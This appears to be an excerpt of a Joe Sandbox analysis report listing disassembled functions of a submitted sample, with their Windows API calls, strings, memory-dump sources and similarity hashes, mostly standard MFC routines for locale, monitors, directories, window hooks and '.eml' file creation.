Instruction Fuzzy Hash: 9FB14330A44204ABE748EB95DDA6FEE7775EB88708F54412EE306362C2CA792540CF6D

Function 0044A200 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(24000003), ref: 0044A22C
SetLastError.KERNEL32(24000004), ref: 0044A25E

Strings

%d_%d_%d_%d_%d, xrefs: 0044A31F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ErrorLast
String ID: %d_%d_%d_%d_%d
API String ID: 1452528299-3521868050
Opcode ID: 9bbd580fb175d91677c13e5913e1f0101b01490f53997e78d89145de81115521
Instruction ID: bc5a39b8eeff56749fa10bfe3cbc161aeb9ea2ca24a958a9802a7c61395c6a94
Opcode Fuzzy Hash: 9bbd580fb175d91677c13e5913e1f0101b01490f53997e78d89145de81115521
Instruction Fuzzy Hash: D9710978A00214EFDB14DF65D898F6A77B5FF48304F108498FA099B381E774AA91CF56

Function 00416101 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0041610B
GetModuleHandleW.KERNEL32(kernel32.dll,00000260,004163D9,?,?), ref: 0041613B
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0041614F
ConvertDefaultLocale.KERNEL32(?), ref: 0041618B
ConvertDefaultLocale.KERNEL32(?), ref: 00416199
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004161B6
ConvertDefaultLocale.KERNEL32(?), ref: 004161E1
ConvertDefaultLocale.KERNEL32(000003FF), ref: 004161EA
GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00416203
EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_00015A0A,?), ref: 00416220
ConvertDefaultLocale.KERNEL32(?), ref: 00416253
ConvertDefaultLocale.KERNEL32(00000000), ref: 0041625C
GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004162A1
_memset.LIBCMT ref: 004162C1

Strings

GetUserDefaultUILanguage, xrefs: 00416143
ntdll.dll, xrefs: 004161FE
GetSystemDefaultUILanguage, xrefs: 0041619B
kernel32.dll, xrefs: 00416124

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 4f89225de2c50b66c18d73926f001d7759325c7bbd9264b14e5dd1e679e3fab4
Instruction ID: f514b111d76e7b175ef72437b735d910effd796748d1e41c1049580f3bf58493
Opcode Fuzzy Hash: 4f89225de2c50b66c18d73926f001d7759325c7bbd9264b14e5dd1e679e3fab4
Instruction Fuzzy Hash: 1D513E74D112289BCB60EFA59C887EDB6F5EF58700F1101EBA848E3291D7789E81CF59

Function 0040E0F7 Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,?,?,?,0040E20B), ref: 0040E122
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040E13E
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040E153
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040E164
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040E175
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040E186
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 0040E197
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040E1B7

Strings

MonitorFromWindow, xrefs: 0040E14D
MonitorFromPoint, xrefs: 0040E16F
EnumDisplayMonitors, xrefs: 0040E180
USER32, xrefs: 0040E118
GetMonitorInfoA, xrefs: 0040E1B1
MonitorFromRect, xrefs: 0040E15E
GetMonitorInfoW, xrefs: 0040E1AA
EnumDisplayDevicesW, xrefs: 0040E191
GetSystemMetrics, xrefs: 0040E138

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2451437823
Opcode ID: fb8cdbe0be23a6513838d73391983c66cb3935b7e548c61214f8ecc92cceee50
Instruction ID: 9e13e317f8f40ab4c83651c961fa7311123fb0df2aac939deb57080edc3306d4
Opcode Fuzzy Hash: fb8cdbe0be23a6513838d73391983c66cb3935b7e548c61214f8ecc92cceee50
Instruction Fuzzy Hash: AF21B072A063149FC750AFB6ACC492B3AF4A6987003344E3FE508E7290D7B865418B8E

Function 00468550 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 256memoryCOMMON

Download Yara Rule

APIs

__wsplitpath_s.LIBCMT ref: 004685CD
_wcslen.LIBCMT ref: 004685DC

Part of subcall function 004035E0: _DebugHeapAllocator.LIBCPMTD ref: 00403635

GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,87E7D08C), ref: 00468611
SetCurrentDirectoryW.KERNEL32(004792EC,?,?,?,?,?,?,?,?,?,87E7D08C), ref: 00468756
_DebugHeapAllocator.LIBCPMTD ref: 004687A0
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,87E7D08C), ref: 004687C5
_DebugHeapAllocator.LIBCPMTD ref: 004687D5
_DebugHeapAllocator.LIBCPMTD ref: 004687EE
_DebugHeapAllocator.LIBCPMTD ref: 004687FD
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,87E7D08C), ref: 00468809

Part of subcall function 00404710: _DebugHeapAllocator.LIBCPMTD ref: 00404747

__wsplitpath_s.LIBCMT ref: 00468874
_DebugHeapAllocator.LIBCPMTD ref: 004688B3

Part of subcall function 004049A0: _DebugHeapAllocator.LIBCPMTD ref: 004049D8
Part of subcall function 004049A0: _DebugHeapAllocator.LIBCPMTD ref: 00404A17

_DebugHeapAllocator.LIBCPMTD ref: 004688FE

Part of subcall function 00404840: _DebugHeapAllocator.LIBCPMTD ref: 00404878
Part of subcall function 00404840: _DebugHeapAllocator.LIBCPMTD ref: 004048BA

_DebugHeapAllocator.LIBCPMTD ref: 00468949

Strings

..\, xrefs: 004686EF
..\, xrefs: 00468650

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$CurrentDirectory$__wsplitpath_s$_wcslen
String ID: ..\$..\
API String ID: 1333085387-3069353027
Opcode ID: 3f89e7188e8420338878dcffe192630af467822c985d0b1664855ff4f79ed0b6
Instruction ID: 901c7102f3e1d0000428d1fe789375148c6050a590677e99de73430e79a50d4a
Opcode Fuzzy Hash: 3f89e7188e8420338878dcffe192630af467822c985d0b1664855ff4f79ed0b6
Instruction Fuzzy Hash: 7CB151B1A002189ADB24DB51CD51BEEB7B8AF45304F0081EEA149A75C1EF795FC4CF96

Function 0041221D Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00412227
CallNextHookEx.USER32(?,?,?,?), ref: 00412267

Part of subcall function 00408BEE: __CxxThrowException@8.LIBCMT ref: 00408C04
Part of subcall function 00408BEE: __EH_prolog3.LIBCMT ref: 00408C11

_memset.LIBCMT ref: 004122C0
GetClassLongW.USER32(?,000000E0), ref: 004122F4
SetWindowLongW.USER32(?,000000FC,Function_00011074), ref: 00412349
GetClassNameW.USER32(?,?,00000100), ref: 0041238F
GetWindowLongW.USER32(?,000000FC), ref: 004123B5
GetPropW.USER32(?,AfxOldWndProc423), ref: 004123CC
SetPropW.USER32(?,AfxOldWndProc423,?), ref: 004123DE
GetPropW.USER32(?,AfxOldWndProc423), ref: 004123E6
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 004123F5
SetWindowLongW.USER32(?,000000FC,Function_000120D0), ref: 00412403
CallNextHookEx.USER32(?,00000003,?,?), ref: 00412415
UnhookWindowsHookEx.USER32(?), ref: 00412429

Strings

AfxOldWndProc423, xrefs: 004123C5, 004123CA, 004123DC, 004123E4, 004123F4
#32768, xrefs: 004122D2, 004122D7, 004123A5

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Long$HookPropWindow$CallClassNext$AtomException@8GlobalH_prolog3H_prolog3_NameThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423
API String ID: 157520791-2141921550
Opcode ID: 7ff8572cd6f91a026d18ff86e2d3ab65370b1a96aff6137a3062930617283cdf
Instruction ID: 424e104ec48ad37bd0147ab63c2fd7b2c0dd8dbb58db76716f7c57f0ca73a16f
Opcode Fuzzy Hash: 7ff8572cd6f91a026d18ff86e2d3ab65370b1a96aff6137a3062930617283cdf
Instruction Fuzzy Hash: 4A51D975500225ABCB21AF61DD48BDF7BB8BF14310F0045A6F409E6291EBB88DD1CBAD

Function 00452FA0 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 225stringfileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000008,00000000,000000FF,?,00000400), ref: 0045309D
lstrcpyW.KERNEL32(?,004A243C), ref: 004530AF
lstrlenW.KERNEL32(?), ref: 004530BC
lstrcatW.KERNEL32(?,?), ref: 0045311B
lstrcatW.KERNEL32(?,.eml), ref: 0045312D
PathIsFileSpecW.SHLWAPI(?), ref: 004531F5
PathFileExistsW.SHLWAPI(?), ref: 00453206
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 00453229

Part of subcall function 0044A200: SetLastError.KERNEL32(24000003), ref: 0044A22C

Strings

Mail (%d).eml, xrefs: 00453272
.eml, xrefs: 00453121

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
